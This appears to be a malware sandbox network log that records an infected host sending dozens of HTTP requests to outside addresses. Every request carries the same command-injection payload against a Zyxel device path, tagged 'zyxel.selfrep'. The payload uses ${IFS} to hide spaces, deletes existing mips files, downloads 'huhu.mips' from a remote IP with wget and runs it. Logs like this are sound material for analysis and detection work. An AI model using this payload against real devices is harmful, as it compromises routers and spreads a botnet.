                                              Jan 29, 2024 07:03:58.169914961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6471192.168.2.143892278.162.89.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169960976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6472192.168.2.144737489.21.38.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.169992924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6473192.168.2.145503645.126.79.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170037031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6474192.168.2.1454690160.84.103.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170059919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6475192.168.2.145745620.25.85.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170099974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6476192.168.2.1440078124.166.186.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170119047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6477192.168.2.1456238120.112.66.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170176983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6478192.168.2.1439312199.123.166.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170233011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6479192.168.2.1454166213.236.75.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170263052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6480192.168.2.1442462153.4.76.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170312881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6481192.168.2.145947878.142.6.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170353889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6482192.168.2.143897882.3.240.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170382023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6483192.168.2.145483249.55.186.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170439005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6484192.168.2.144481496.209.139.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170474052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6485192.168.2.144723847.249.23.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170509100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6486192.168.2.1453206161.124.105.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170543909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6487192.168.2.144131857.1.38.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170588970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6488192.168.2.1443388170.82.248.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170614958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6489192.168.2.1455274166.113.192.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170636892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6490192.168.2.1440418130.225.6.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170696974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6491192.168.2.145872048.180.62.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170723915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6492192.168.2.1444448173.197.120.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170761108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6493192.168.2.145355059.244.97.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170784950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6494192.168.2.143672485.126.55.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170831919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6495192.168.2.1444188167.148.206.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170883894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6496192.168.2.143952884.83.65.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170916080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6497192.168.2.1450918175.55.35.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.170979977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6498192.168.2.1453152211.73.136.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171008110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6499192.168.2.145529874.38.77.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171049118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6500192.168.2.144097473.119.139.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171098948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6501192.168.2.1451356221.122.179.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171125889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6502192.168.2.144054236.167.7.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171145916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6503192.168.2.145951451.233.180.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171204090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6504192.168.2.145308658.230.112.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171240091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6505192.168.2.1445988189.140.93.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171293974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6506192.168.2.1445270221.49.173.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171331882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6507192.168.2.145509899.91.151.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171353102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6508192.168.2.145717652.161.69.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171382904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6509192.168.2.144385083.248.217.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171430111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6510192.168.2.144701461.220.169.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171463966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6511192.168.2.143474047.87.58.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171498060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6512192.168.2.1450784166.91.127.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171544075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6513192.168.2.1453706118.153.42.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171567917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6514192.168.2.1443924161.22.210.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171607018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6515192.168.2.144592438.117.7.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171657085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6516192.168.2.1448112197.254.76.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171680927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6517192.168.2.144206259.44.29.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171750069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6518192.168.2.1456526146.55.224.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171768904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6519192.168.2.1441132132.49.246.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171794891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6520192.168.2.1447652150.111.31.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171833038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6521192.168.2.1454100173.238.4.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171874046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6522192.168.2.143931417.200.116.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171906948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6523192.168.2.1434056197.13.123.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171937943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6524192.168.2.144154651.83.103.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:58.171979904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6525192.168.2.1456676171.76.205.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186405897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6526192.168.2.1446346108.232.238.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186441898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6527192.168.2.1458926122.21.216.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186461926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6528192.168.2.1441784189.186.111.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186530113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6529192.168.2.144847236.122.183.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186562061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6530192.168.2.1437388212.130.30.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186600924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6531192.168.2.1434556183.181.187.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186641932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6532192.168.2.1435382151.78.40.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186660051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6533192.168.2.1459260165.178.10.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:59.186738014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6534192.168.2.144282296.136.97.89443
                                              TimestampBytes transferredDirectionData
